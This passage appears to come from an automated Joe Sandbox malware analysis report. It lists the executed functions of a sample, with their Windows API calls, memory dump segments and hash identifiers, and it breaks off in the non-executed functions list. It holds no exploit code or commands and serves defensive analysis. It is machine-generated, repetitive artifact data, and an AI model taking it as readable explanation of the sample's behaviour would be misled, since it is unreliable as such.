                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 15bc69ad061a33c6f6a7e6ccafb36c10484b8ef0a52d828df9edcefcba45c8f2
                                      • Instruction ID: cb078b51cf16ee91508d9a3ffafbd0de790d53047ba899e67f3fdeaaeb2bf614
                                      • Opcode Fuzzy Hash: 15bc69ad061a33c6f6a7e6ccafb36c10484b8ef0a52d828df9edcefcba45c8f2
                                      • Instruction Fuzzy Hash: 0BF0E930081B199FEB308A34C4487A377E86B12321F140B1FD2E382AE0D3686D8D8A44
                                      Function 004FA4ED Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,004FA325,00000001,004F70E6,?,004FA175,?,00000001,00000000,?,?), ref: 004FA501
                                        • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: AttributesFile_wcslen
                                      • String ID:
                                      • API String ID: 2048169685-0
                                      • Opcode ID: 07cb2880fd213d30cb166baff19a7b0b72570f99154e040bee22b1631eb391d5
                                      • Instruction ID: 328333cef3696410d7c29f8c7e7c705158faecfe5c00dc42f19d7970f2e34fed
                                      • Opcode Fuzzy Hash: 07cb2880fd213d30cb166baff19a7b0b72570f99154e040bee22b1631eb391d5
                                      • Instruction Fuzzy Hash: 4EF0A03220020DBBDF015F60DC09FEA376DBF14385F448051B948D5160DB35DAD9EB64
                                      Function 004FA1E0 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNELBASE(000000FF,?,?,004F977F,?,?,004F95CF,00000000,Function_00032641,000000FF), ref: 004FA1F1
                                        • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: DeleteFile_wcslen
                                      • String ID:
                                      • API String ID: 3339486230-0
                                      • Opcode ID: 656439ad2c06551333fd3c8e04851f577cb7a793234b748aa8963716777c3476
                                      • Instruction ID: 8603a0be111b61857d601880551fe2102c7d1d9d14c8b8b2fd6f8d9baa74b58c
                                      • Opcode Fuzzy Hash: 656439ad2c06551333fd3c8e04851f577cb7a793234b748aa8963716777c3476
                                      • Instruction Fuzzy Hash: F7E022312002096BEB009F20DC09FEA379CFF083C5F080062BA08D2150EB25EED9EA68
                                      Function 004FA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,004FA592,000000FF,?,?), ref: 004FA6C4
                                        • Part of subcall function 004FA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,004FA592,000000FF,?,?), ref: 004FA6F2
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004FA598
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Find$FileFirst$Close
                                      • String ID:
                                      • API String ID: 2810966245-0
                                      • Opcode ID: 11d7c3ac51d03bec46b496e997e35c0c41aafe5e8ae040744c684bc453d264af
                                      • Instruction ID: d4d28e9f08d14610276c56828e033b7a78656c24031f31182b7cccc59d91e8e2
                                      • Opcode Fuzzy Hash: 11d7c3ac51d03bec46b496e997e35c0c41aafe5e8ae040744c684bc453d264af
                                      • Instruction Fuzzy Hash: 59F0E271008394AACB2257B48804BEB7BD06F1A335F048A4FF2FD52296C37910A99B37
                                      Function 0050AC7C Relevance: 1.5, APIs: 1, Instructions: 26comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleUninitialize.OLE32(?,?,?,?,Function_00032641,000000FF), ref: 0050ACB5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Uninitialize
                                      • String ID:
                                      • API String ID: 3861434553-0
                                      • Opcode ID: e64ea2d697441c3b265be847a8e4c83b2250e577d0255035687df81c7938e592
                                      • Instruction ID: ded5a7b2cdde21b746613cd7c8eb97a96d4a97db64cdff89eebe2317b25bb52c
                                      • Opcode Fuzzy Hash: e64ea2d697441c3b265be847a8e4c83b2250e577d0255035687df81c7938e592
                                      • Instruction Fuzzy Hash: 6FE06D76604A50EFCB119B58DC06B49FFA8FB89B20F10426AF416D37B0CF74B801CA90
                                      Function 0050F4E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___security_init_cookie.LIBCMT ref: 0050F530
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ___security_init_cookie
                                      • String ID:
                                      • API String ID: 3657697845-0
                                      • Opcode ID: 782a6d84ff551b70dd12fd652aaf6a6e882065f31a8d07acc15438d44750f5d9
                                      • Instruction ID: b8fa31aaf78919f1e56b001e1823057912b437882c0a0f994b772eb08a42fb25
                                      • Opcode Fuzzy Hash: 782a6d84ff551b70dd12fd652aaf6a6e882065f31a8d07acc15438d44750f5d9
                                      • Instruction Fuzzy Hash: 0DE0923190824F9BDF35AFD8D8063ED7FB1FB84324F100A75E91123AD1963119408751
                                      Function 0050A626 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      APIs
                                      • 74096BB0.GDIPLUS(00000010), ref: 0050A62C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: 74096
                                      • String ID:
                                      • API String ID: 1329529294-0
                                      • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                      • Instruction ID: dc2990593fc10869b968f2ef9983d3fb16fe1069f6bbafafd16125baab013706
                                      • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                      • Instruction Fuzzy Hash: 8FD0C97161030ABADF426B718C1BAAE7EA9FB40340F148925BD42D51D1EAB2D910A662
                                      Function 0050DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0050DD92
                                        • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                        • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                        • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010400,?), ref: 0050B59E
                                        • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                        • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      • Opcode ID: a389d5f143c839fc37eaeddc1f71e83505439f3d9088a793d72788668a503031
                                      • Instruction ID: a25a280d509a0fa342991475331295f2ba2536b1aee545b901a9a2ab480082e6
                                      • Opcode Fuzzy Hash: a389d5f143c839fc37eaeddc1f71e83505439f3d9088a793d72788668a503031
                                      • Instruction Fuzzy Hash: 6CD09E31144301BADA022B51CD0AF1E7AA2BB98B09F004554B284740F18A729D25EB11
                                      Function 004F98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileType.KERNELBASE(?,004F97BE), ref: 004F98C8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 384a2b4c2a51a076ef30ae197247dbf58f4e41f66203b45841ddce53227e6edd
                                      • Instruction ID: cbd4227e22ca7200090e841f90c26c6343974bca81c77d2d10f084f502424684
                                      • Opcode Fuzzy Hash: 384a2b4c2a51a076ef30ae197247dbf58f4e41f66203b45841ddce53227e6edd
                                      • Instruction Fuzzy Hash: 63C0123441010985CE34A62498481A67311AF533E57B48696C128852A1C32BCC8BEA14
                                      Function 004F9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEndOfFile.KERNELBASE(?,004F903E,?,?,-00000870,?,?,?,?,00000000,?,-00000974,?,?,?,?), ref: 004F9F0C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: 92b7feda9912ae2e9b0bb0f98bb2844365574466ae348f78e833ab1a293d336f
                                      • Instruction ID: 09a0879771245ffa0b83d7bedc369e998c3a15c47325866cc1305f79b2747bbc
                                      • Opcode Fuzzy Hash: 92b7feda9912ae2e9b0bb0f98bb2844365574466ae348f78e833ab1a293d336f
                                      • Instruction Fuzzy Hash: F6A0123004000986CE101730C90850C3710FB217C070001945006CA061C716440B9610
                                      Function 0050AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?), ref: 0050AC08
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: c18146f3d28a91b56d08ae53210702ba2a0da0c9be05b1624a564c6901d604d6
                                      • Instruction ID: 402abfea90775880551de52270409819b0bb2af8f3460e2307654a6e0cd29412
                                      • Opcode Fuzzy Hash: c18146f3d28a91b56d08ae53210702ba2a0da0c9be05b1624a564c6901d604d6
                                      • Instruction Fuzzy Hash: 7EA011302002008B83000B328F0AA0EBAAAAFA2B00F00C028A00080030CB38C8B0FA00
                                      Function 006D4598 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 006D45C3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 6a69d03eff1d73ed3ecc0d7b0d73a89e904afd1bf10cad8c22920386fa559922
                                      • Instruction ID: 0f307bda21708c8d235b693c5381613291d716f93c8806c856ec33463e1f0eac
                                      • Opcode Fuzzy Hash: 6a69d03eff1d73ed3ecc0d7b0d73a89e904afd1bf10cad8c22920386fa559922
                                      • Instruction Fuzzy Hash: 37E0ECB5B00108ABDB10CE8CE944F9A33DEA748310F148012F609D7340C634EC109B65
                                      Function 006D4598 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 006D45C3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 00567000, based on PE: true
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 6a69d03eff1d73ed3ecc0d7b0d73a89e904afd1bf10cad8c22920386fa559922
                                      • Instruction ID: 0f307bda21708c8d235b693c5381613291d716f93c8806c856ec33463e1f0eac
                                      • Opcode Fuzzy Hash: 6a69d03eff1d73ed3ecc0d7b0d73a89e904afd1bf10cad8c22920386fa559922
                                      • Instruction Fuzzy Hash: 37E0ECB5B00108ABDB10CE8CE944F9A33DEA748310F148012F609D7340C634EC109B65

                                      Non-executed Functions

                                      Function 0051D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
